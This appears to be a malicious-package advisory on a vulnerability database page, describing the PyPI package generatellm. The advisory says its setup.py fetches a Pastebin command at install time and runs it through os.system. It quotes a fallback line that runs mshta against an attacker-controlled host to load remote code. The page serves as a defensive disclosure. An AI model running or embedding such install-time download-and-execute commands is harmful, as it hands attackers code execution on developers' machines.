MAL-2026-5773

    Dashboard / Malicious Package / MAL-2026-5773

    MAL-2026-5773

    Published: 14 Jun 2026Last Modified: 17 Jun 2026

    Summary: Malicious code in generatellm (PyPI)

    Details: Source: amazon-inspector (31201af7035560c0798b46e67a374b9526a7e8ed2f856235e5eb0438d1a8d080) GenerateLLM 2.23 is a hollow PyPI package (placeholder metadata, no functional code under src/, only an egg-info directory) whose entire payload is an install-time remote code execution dropper. setup.py at lines 31-35 fetches https://pastebin.com/raw/yBcUM1QB, takes the first line of the response, and passes it directly to os.system via `cmd /c "{cmd_pastebin}"`, executing arbitrary attacker-controlled commands on the installer's machine. If the Pastebin fetch fails, setup.py line 38 falls back to `os.system('cmd /c "mshta http://fixars.top"')`, abusing the Windows mshta.exe LOLBin to load and execute a remote HTA application from an unrelated, non-publisher, plain-HTTP domain. Both branches fire automatically during `pip install GenerateLLM` with no user interaction. The Pastebin URL is mutable and anonymous, so the executed command can be changed by the attacker at any time without republishing the package. The generic LLM-themed name with no real author identity is consistent with namespace-squatting designed to lure developers searching for LLM tooling. Source: kam193 (36e93812557935f67592c02b6c54a2aa7dde6472fbcae491a63957cc02c0a070) During installation, the code attempts to download and start a malicious executable. Likely related to 2025-08-raknet-testing-package. Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers. Campaign: 2026-06-easyaillm Reasons (based on the campaign): - Downloads and executes a remote executable. - obfuscation - malware - tool:mshta

    Affected packages

    Package

    Name: generatellm

    Purl: pkg:pypi/generatellm

    Affected ranges

    Type: N/A

    Events:

    Introduced- None
    Fixed -None

    Affected versions

    2.21
    MAL-2026-5773 | CVE-DB